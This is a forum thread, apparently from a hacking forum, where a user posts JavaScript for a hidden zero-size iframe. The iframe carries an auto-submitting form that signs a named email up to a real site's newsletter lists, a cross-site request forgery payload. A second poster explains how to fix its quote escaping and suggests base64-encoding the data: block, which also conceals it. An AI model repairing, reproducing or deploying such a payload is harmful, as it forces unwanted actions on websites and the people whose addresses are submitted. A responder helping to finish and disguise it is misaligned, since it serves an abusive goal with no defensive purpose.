Problem with js code

Talk about any languages right here. Share and discuss source, but don't expect your homework to be done for you.
Post Reply
privateloader
Strike 1
Posts: 38
Joined: Fri Aug 22, 2014 5:50 am

Problem with js code

Post by privateloader » Fri Aug 26, 2016 9:10 am

Hi hope you doing well,

I know that you have mad skills in coding and i wonder if you could make this code to work.

Code: Select all

<script>
document.write('<iframe src=\"data:text/html;charset=utf-8,<form method="post" name="subscribeform" action="http://www.nkk.dk/nyhedsbrev/?p=subscribe"><input type="hidden" name="formtoken" value="9cf80e7901984c446df7aac12696c288"><input type="hidden" name="email" value="emailtest@gmail.com"><input type="hidden" name="htmlemail" value="1"><input type="hidden" name="attribute7" value="Joaquim"><input type="hidden" name="attribute6" value="Broodly"><input type="hidden" name="rssfrequency" value="daily"><input type="hidden" name="list[3]" value="signup"><input type="hidden" name="listname[3]" value="Updates fra nkk.dk"><input type="hidden" name="list[2]" value="signup"><input type="hidden" name="listname[2]" value="NKK Info"><input type="hidden" name="VerificationCodeX" value=""><input type="submit" name="subscribe" value="subscribe"></form><script>document.forms[0]["subscribe"].click();</script>\" frameborder=\"0\" heigth=\"0\" width=\"0\"></iframe>');
</script>
The exact problem is with \" which makes the code invalid. (This is an interpretor like ' or "), i have tried several times without success even post online for help but no one was able to fix it. The code between data://... ...</form> works perfectly. Just use in the address bar.

When running this page the part that seems to break the js code is

Code: Select all

\" frameborder=\"0\" heigth=\"0\" width=\"0\"></iframe>');
Thanks

User avatar
Cool_Fire
Not a sandwich
Posts: 1888
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d
Contact:

Re: Problem with js code

Post by Cool_Fire » Wed Aug 31, 2016 12:30 am

I think you should be escaping the double quotes inside the data: section, not those outside it. The ones outside it are in a ' quoted string and don't need escaping. But your data: stream is inside " quotes so any extra " quotes do need escaping.

A quick way to cheat having to do any escaping at all would be to just use a different encoding for your data: block. You can base64 encode data: blocks for example.

Code: Select all

src="data:text/html;base64,f0O...B4r="
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.

Post Reply